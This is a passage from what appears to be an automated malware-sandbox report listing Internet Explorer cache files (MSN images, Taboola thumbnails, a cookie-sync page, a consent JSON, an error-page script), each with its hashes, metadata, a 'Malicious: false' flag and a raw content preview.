                                                                                                                                                                                                                                                          Entropy (8bit):7.907032346552725
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:BGAaEXNRrcKuXiRDpKDvwSQWEMqQLFU4JpvoCpaSzMQFUihxh1Y3:BCqR49UpKD4WHO4JpvtzdUihP1M
                                                                                                                                                                                                                                                          MD5:A2CAD5E4667E45F3325CD3383F768F46
                                                                                                                                                                                                                                                          SHA1:182168CD5717C316D42502C8DB2CCC8328FA17D2
                                                                                                                                                                                                                                                          SHA-256:A4B276BBEC27CE9C2CE9B8E967020FF34B2E8F6865A96C5DC4D9829B4241CF17
                                                                                                                                                                                                                                                          SHA-512:B911E5C9A0AE1B17D38B2A6CE089BC4265C64D2872333951243DF8842C3858096AFF768833264528B97B4103F079D2F582991C642F70CAD18A62BD1B875DFD63
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dytaa.img?h=250&w=206&m=6&q=60&u=t&o=t&l=f&f=jpg&x=777&y=131
                                                                                                                                                                                                                                                          Preview: ......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(.. (...(...(...(......(.r..A.j...*c.u,.l...*$...7b...OSQ:4m...=T...6.^.Y...I..JLm":(..3.(...(....Z(.(.....Z(.h.....Z(.(........P.QN.>8e.>\l...@0.!.8F....?Z.ic=..^..{V.../.[.U..Y..R>a.??._...O.....y.6t..m..,.|.<.8...X.@.-..# .../4.(.<O.nR...j....2F.).#..[...G=E-....J)h..%.........1@....LP.QKE.;.b..1L..S.F(.....)q@..jh.....E...8i.._..*..i..F.bv........o...k
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\BB6Ma4a[1].png
                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):396
                                                                                                                                                                                                                                                          Entropy (8bit):6.789155851158018
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPkR/CnFPFaUSs1venewS8cJY1pXVhk5Ywr+hrYYg5Y2dFSkjhT5uMEjrTp:6v/78/kFPFnXleeH8YY9yEMpyk3Tc
                                                                                                                                                                                                                                                          MD5:6D4A6F49A9B752ED252A81E201B7DB38
                                                                                                                                                                                                                                                          SHA1:765E36638581717C254DB61456060B5A3103863A
                                                                                                                                                                                                                                                          SHA-256:500064FB54947219AB4D34F963068E2DE52647CF74A03943A63DC5A51847F588
                                                                                                                                                                                                                                                          SHA-512:34E44D7ECB99193427AA5F93EFC27ABC1D552CA58A391506ACA0B166D3831908675F764F25A698A064A8DA01E1F7F58FE7A6A40C924B99706EC9135540968F1A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB6Ma4a.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                                                                                          Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........(J....!IDAT8Oc|. ..?...|.UA....GP.*`|. ......E...b.....&.>..*x.h....c.....g.N...?5.1.8p.....>1..p...0.EA.A...0...cC/...0Ai8...._....p.....)....2...AE....Y?.......8p..d......$1l.%.8.<.6..Lf..a.........%.....-.q...8...4...."...`5..G!.|..L....p8 ...p.......P....,..l.(..C]@L.#....P...)......8......[.7MZ.....IEND.B`.
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\BBK9Hzy[1].png
                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):541
                                                                                                                                                                                                                                                          Entropy (8bit):7.367354185122177
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/78/W/6T4onImZBfSKTIxS9oXhTDxfIR3N400tf3QHPK5jifFpEPy:U/6rIcBfYxGoxfxfrLqHPKhif7T
                                                                                                                                                                                                                                                          MD5:4F50C6271B3DF24A75AD8E9822453DA3
                                                                                                                                                                                                                                                          SHA1:F8987C61D1C2D2EC12D23439802D47D43FED3BDF
                                                                                                                                                                                                                                                          SHA-256:9AE6A4C5EF55043F07D888AB192D82BB95D38FA54BB3D41F701863239E16E21C
                                                                                                                                                                                                                                                          SHA-512:AFA483EAFEAF31530487039FB1727B819D4E61E54C395BA9553C721FB83C3B16EDF88E60853387A4920AB8F7DFAD704D1B6D4C12CDC302BE05427FC90E7FACC8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBK9Hzy.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                                                                                          Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs.................IDAT8O.Q.K[A...M^L../+....`4..x.GAiQb..E<..A.x..'!.P(-..x....`.,...D.)............ov..Yx.`_.4...@._ .r...w.$.H....W...........mj."...IR~f...J..D.|q.......~.<....<.I(t.q.....t...0.....h,.1.......\.1.........m......+.zB..C.....^.u:.....j.o*..j....\../eH.,......}...d-<!t.\.>..X.y.W....evg.Jho..=w*.*Y...n.@.....e.X.z.G.........(4.H...P.L.:".%tls....jq..5....<.)~....x...]u(..o./H.....Hvf....*E.D.).......j/j.=]......Z.<Z....IEND.B`.
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\BBMW3y8[1].png
                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):542
                                                                                                                                                                                                                                                          Entropy (8bit):7.35756382239522
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/78/hqJdZI4HDyJcDag9nxoDazIWWSiuC:bqJTxHDyK+g9kazPhiR
                                                                                                                                                                                                                                                          MD5:A7F47EA6749E7F983C2847FD037DEB7A
                                                                                                                                                                                                                                                          SHA1:75E0D2C648EABA94110377FB04A4735FFFE78666
                                                                                                                                                                                                                                                          SHA-256:7DE0FB95FE9F84CFA3F6AD5C244EE32D5BCAC0D391326EBC57B6F97FB45B5B61
                                                                                                                                                                                                                                                          SHA-512:C41EC5B03EA2FF6C6565DCF05CCEA387689C86D971663F24ACD96C5979D2911C86E7216EDE11832509031D1D507734C540DF0E8092D94BBF0330210B4ACF3F70
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBMW3y8.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                                                                                          Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....IDAT8O.RAK.Q.=..D..A....Ed.E.B7..A.MV...W./....j'......F!B.H...E.3.z.......x.....~.{...V.L....N.}q.\.;.n...`JS:.......Oga>.. ..Td>....Z"M%../@{..0|..........`.d##.....9.Z..........v9...v&Vt..z...J.&..e.....^_.Z{.r.a....:^yvE.o..Y..,..=B.?..a.Q_^.&.&_........'..&Nx.x...nD...j.Z...I+.P]:......#.t.d.)..f..l..': .W#.gg...'.p...i.f(&i.(j9P....a..../$.V..d?....|.[...Q:-w...QH..C&t..?y[..~S..o.k+.RWtH-7.l.k;.K....w../.Ka...............IEND.B`.
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\BBXXVfm[1].png
                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):823
                                                                                                                                                                                                                                                          Entropy (8bit):7.627857860653524
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:U/6IPdppmpWEL+O4TCagyP79AyECQdYTVc6ozvqE435/kc:U/6Ilpa4T/0IVKdI1
                                                                                                                                                                                                                                                          MD5:C457956A3F2070F422DD1CC883FB4DFB
                                                                                                                                                                                                                                                          SHA1:67658594284D733BB3EE7951FE3D6EE6EB39C8E2
                                                                                                                                                                                                                                                          SHA-256:90E75C3A88CD566D8C3A39169B1370BBE5509BCBF8270AF73DB9F373C145C897
                                                                                                                                                                                                                                                          SHA-512:FE9D1C3F20291DFB59B0CEF343453E288394C63EF1BE4FF2E12F3F9F2C871452677B8346604E3C15A241F11CC7FEB0B91A2F3C9A2A67E446A5B4A37D331BCEA3
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBXXVfm.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                                                                                          Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs.................IDAT8O.SKH.a....g.....E..j..B7..B..... .L)q.&t..\EA. A.. D.. 7..M.(#A.t|&..z.3w.....Zu.;s.9.;................i.o.P.:....D.+...!.....4.g.J..W..F.mC..%tt0I.j..J..kU.o.*..0.....qk4....!>.>...;...Q..".5$..oaX..>..:..Ebl..;.{s...W.v..#k}].)}......U.'....R..(..4..n..dp......v.@!..^G0....A..j.}..h+..t.....<..q...6.*8.jG......E%...F.......ZT....+....-.R.....M.. .A.wM........+.F}.....`-+u....yf..h,.KB.0......;I.'..E.(...2VR;.V*...u...cM..}....r\.!.J>%......8f"....q.|...i..8..I1..f.3p.@ $a.k.A...3..I.O.Dj...}..PY.5`...$..y.Z..t... ...|.E.zp............>f..<*z.If...9Z;....O.^B.Q..-.C....=.......v?@).Q..b...3....`.9d.D5.......X.....Za.......!#h*.. \&s....M3Qa..%.p..\1..xE.>..-J.._........?..?*5e......IEND.B`.
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\BBY7ARN[1].png
                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):778
                                                                                                                                                                                                                                                          Entropy (8bit):7.591554400063189
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/78/W/6TiO53VscuiflpvROsc13pPaOSuTJ8nKB8P9FekVA7WMZQ4CbAyvK0A:U/6WO5Fs2dBRGQOdl8Y8PHVA7DQ4CbX0
                                                                                                                                                                                                                                                          MD5:7AEA772CD72970BB1C6EBCED8F2B3431
                                                                                                                                                                                                                                                          SHA1:CB677B46C48684596953100348C24FFEF8DC4416
                                                                                                                                                                                                                                                          SHA-256:FA59A5A8327DB116241771AFCD106B8B301B10DBBCB8F636003B121D7500DF32
                                                                                                                                                                                                                                                          SHA-512:E245EF217FA451774B6071562C202CA2D4ACF7FC176C83A76CCA0A5860416C5AA31B1093528BF55E87DE6B5C03C5C2C9518AB6BF5AA171EC658EC74818E8AB2E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBY7ARN.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                                                                                          Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs.................IDAT8OMS[k.Q..v.....)&V*.*"./(H. U..|P,.....DP.}...bA.A|.....J..k.5Mj..ic...^.3.Mq..33;.\....*..EK8.".2x.2.m;.}."..V...o..W7.\.5P...p.........2..+p..@4.-...R..{....3..#.-.. .E.Y....Z..L ..>z...[.F...h.........df_...-....8..s*~.N...|...,..Ux.5.FO#...E4.#.#.B.@..G.A.R._. .."g.s1.._@.u.zaC.F.n?.w.,6.R%N=a....B:.Z.UB...>r..}.....a.....\4.3.../a.Q.......k<..o.HN.At.(../)......D*...u...7o.8|....b.g..~3...Y8sy.1IlJ..d.o.0R]..8...y,\...+.V...:?B}.#g&.`G.........2.......#X.y).$..'.Z.t.7O.....g.J.2..`..soF...+....C.............z.....$.O:./...../].]..f.h*W.....P....H.7..Qv...rat....+.(..s.n..w...S...S...G.%v.Q.aX.h.4....o.~.nL.lZ..6.=...@..?.f.H...[..I)..["w..r.....IEND.B`.
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cfdbd9[1].png
                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):740
                                                                                                                                                                                                                                                          Entropy (8bit):7.552939906140702
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/70MpfkExg1J0T5F1NRlYx1TEdLh8vJ542irJQ5nnXZkCaOj0cMgL17jXGW:HMuXk5RwTTEovn0AXZMitL9aW
                                                                                                                                                                                                                                                          MD5:FE5E6684967766FF6A8AC57500502910
                                                                                                                                                                                                                                                          SHA1:3F660AA0433C4DBB33C2C13872AA5A95BC6D377B
                                                                                                                                                                                                                                                          SHA-256:3B6770482AF6DA488BD797AD2682C8D204ED536D0D173EE7BB6CE80D479A2EA7
                                                                                                                                                                                                                                                          SHA-512:AF9F1BABF872CBF76FC8C6B497E70F07DF1677BB17A92F54DC837BC2158423B5BF1480FF20553927ECA2E3F57D5E23341E88573A1823F3774BFF8871746FFA51
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          IE Cache URL:https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/cfdbd9.png
                                                                                                                                                                                                                                                          Preview: .PNG........IHDR................U....sBIT....|.d.....pHYs...........~.....tEXtSoftware.Adobe Fireworks CS6......tEXtCreation Time.07/21/16.~y....<IDATH..;k.Q....;.;..&..#...4..2.....V,...X..~.{..|.Cj......B$.%.nb....c1...w.YV....=g.............!..&.$.mI...I.$M.F3.}W,e.%..x.,..c..0.*V....W.=0.uv.X...C....3`....s.....c..............2]E0.....M...^i...[..]5.&...g.z5]H....gf....I....u....:uy.8"....5...0.....z.............o.t...G.."....3.H....Y....3..G....v..T....a.&K......,T.\.[..E......?........D........M..9...ek..kP.A.`2.....k...D.}.\...V%.\..vIM..3.t....8.S.P..........9.....yI.<...9.....R.e.!`..-@........+.a..*x..0.....Y.m.1..N.I...V.'..;.V..a.3.U....,.1c.-.J<..q.m-1...d.A..d.`.4.k..i.......SL.....IEND.B`.
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\checksync[1].htm
                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):20808
                                                                                                                                                                                                                                                          Entropy (8bit):5.301493036290279
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:RpAGcVXlblcqnzleZSug2f5vzBgF3OZOsQWwY4RXrqt:386qhbz2RmF3OssQWwY4RXrqt
                                                                                                                                                                                                                                                          MD5:72C1F1F3F129C727E7B71E4873CC2B9F
                                                                                                                                                                                                                                                          SHA1:18352C21C278361D11A7C9536A0B65CE08DE44CC
                                                                                                                                                                                                                                                          SHA-256:C9B5A016306FD45301DC8F69359D1B1C983F6661F22990A72EF15026FC334BBF
                                                                                                                                                                                                                                                          SHA-512:B58D34ACDFA63F54E3C47C76B2E9A3F7789FB07087846A15535BBD9472FC44D74576005783DFA50057D320D351D2B82BD05DF8126D9444EB06F37D10E6822A0D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":75,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\checksync[2].htm
                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):20808
                                                                                                                                                                                                                                                          Entropy (8bit):5.301493036290279
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:RpAGcVXlblcqnzleZSug2f5vzBgF3OZOsQWwY4RXrqt:386qhbz2RmF3OssQWwY4RXrqt
                                                                                                                                                                                                                                                          MD5:72C1F1F3F129C727E7B71E4873CC2B9F
                                                                                                                                                                                                                                                          SHA1:18352C21C278361D11A7C9536A0B65CE08DE44CC
                                                                                                                                                                                                                                                          SHA-256:C9B5A016306FD45301DC8F69359D1B1C983F6661F22990A72EF15026FC334BBF
                                                                                                                                                                                                                                                          SHA-512:B58D34ACDFA63F54E3C47C76B2E9A3F7789FB07087846A15535BBD9472FC44D74576005783DFA50057D320D351D2B82BD05DF8126D9444EB06F37D10E6822A0D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":75,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\de-ch[1].json
                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):76785
                                                                                                                                                                                                                                                          Entropy (8bit):5.343242780960818
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:olAy9XsiItnuy5zIux1whjCU7kJB1C54AYtiQzNEJEWlCFPQtihPxVUYUEJ0YAtF:olLEJxa4CmdiuWloIti1wYm7B
                                                                                                                                                                                                                                                          MD5:DBACAF93F0795EB6276D58CC311C1E8F
                                                                                                                                                                                                                                                          SHA1:4667F15EAB575E663D1E70C0D14FE2163A84981D
                                                                                                                                                                                                                                                          SHA-256:51D30486C1FE33A38A654C31EDB529A36338FBDFA53D9F238DCCB24FF42F75AF
                                                                                                                                                                                                                                                          SHA-512:CFC1986EF5C82A9EA3DCD22460351DA10CF17BA6CDC1EE8014AAA8E2A255C66BB840B0A5CC91E0EB42E6FE50EC0E2514A679EA960C827D7C8C9F891E55908387
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          IE Cache URL:https://www.msn.com/_h/e012d846/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-86263d365d28/6f0cca92-2dda-4588-a757-0e009f333603/de-ch.json
                                                                                                                                                                                                                                                          Preview: {"DomainData":{"pclifeSpanYr":"Year","pclifeSpanYrs":"Years","pclifeSpanSecs":"A few seconds","pclifeSpanWk":"Week","pclifeSpanWks":"Weeks","cctId":"55a804ab-e5c6-4b97-9319-86263d365d28","MainText":"Ihre Privatsph.re","MainInfoText":"Wir verarbeiten Ihre Daten, um Inhalte oder Anzeigen bereitzustellen, und analysieren die Bereitstellung solcher Inhalte oder Anzeigen, um Erkenntnisse .ber unsere Website zu gewinnen. Wir geben diese Informationen auf der Grundlage einer Einwilligung und eines berechtigten Interesses an unsere Partner weiter. Sie k.nnen Ihr Recht auf Einwilligung oder Widerspruch gegen ein berechtigtes Interesse aus.ben, und zwar auf der Grundlage eines der folgenden bestimmten Zwecke oder auf Partnerebene .ber den Link unter jedem Zweck. Diese Entscheidungen werden an unsere Anbieter, die am Transparency and Consent Framework teilnehmen, signalisiert.","AboutText":"Weitere Informationen","AboutCookiesText":"Ihre Privatsph.re","ConfirmText":"Alle zulassen","AllowAll
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\httpErrorPagesScripts[1]
                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):12105
                                                                                                                                                                                                                                                          Entropy (8bit):5.451485481468043
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                                                                                                                                                                                                                                          MD5:9234071287E637F85D721463C488704C
                                                                                                                                                                                                                                                          SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                                                                                                                                                                                                                                          SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                                                                                                                                                                                                                                          SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          IE Cache URL:res://ieframe.dll/httpErrorPagesScripts.js
                                                                                                                                                                                                                                                          Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\http___cdn.taboola.com_libtrc_static_thumbnails_3e4db03aeb27326fa409d0201601c66d[1].jpg
                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):10928
                                                                                                                                                                                                                                                          Entropy (8bit):7.956030588292682
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:L6zlqp97Pzn186KnXg5acKZ4KdQiTD/DetwAIM/6c+8MefqXlS5UiG:OJeZzJ+y4QiTD/DeH/63GiV6+
                                                                                                                                                                                                                                                          MD5:0C1A16B7BE63A652982673F6557DC826
                                                                                                                                                                                                                                                          SHA1:57270462703461486071ABBA8C09E0A4D763AC81
                                                                                                                                                                                                                                                          SHA-256:708CCCB9C1594400AC6F3AD998B498A9EEDCC50A8A6194EA633C9DC6D656B139
                                                                                                                                                                                                                                                          SHA-512:2D0937F8E4547A895BAFACF1644CC7F465F5D081BF4B600ABDC8C7A275E69B335A0A4C5452DFFBE1CB1A8F6C62FFEB2D1CFF672755764F3B3274A0140E47842F
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          IE Cache URL:https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F3e4db03aeb27326fa409d0201601c66d.jpg
                                                                                                                                                                                                                                                          Preview: ......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C.......)..)W:1:WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW......7.....................................................................................oCk..9\..`. v..../D.Hs5 .4..Vu=@..1..g.A.....Y.....HV5cN....jy..k..........b.@..8...K........N..&...\.N:..WT.0..I..q8z.4...&fP...5|..p.51J...).....(>.Q.\...e....(.L..k...v.Q..5...F.jL..A.....z.@u.....[+....AhG*......c.......VR.&a.x\..d......}...:......4.2.A..3N;B.Z1...\.T....8..^....v.]...R.o.;.1....}..7VE....2.....V.&;P...9.R]>....UY.zn6...Ej........(Md....JBMX........T...>.%.^.1.af.w..Y.M.ft.......*.a....Rc..9..jj.N~....Nl..BW;f.......O...g-..PY.f...6...@..k..|.u....E.N.>.m\.1..@...C.(-r..D.".C..f....y.*Y..K.S=-3.. @.......:.....xsb.Z.;.^.3{..<.<...Y\...........4.. .BZ.d.....}W..yG..~..`o.w.\.$.. @.....VcQ...A@.Z....Kx.;9#k.5..G.1...... @.`.>Z..OK.i#..'..O....i...w........... .8.....A.....?...f...,Zg.
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\http___cdn.taboola.com_libtrc_static_thumbnails_83391a7002b8c5f42ca4f88e9ece32cd[1].jpg
                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):13809
                                                                                                                                                                                                                                                          Entropy (8bit):7.9623522043353985
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:/81dI9o9ZW/wXcfDASJ0AwRZzkzHIspawrKr:/8XIa9ZW/KcfRuzet3rKr
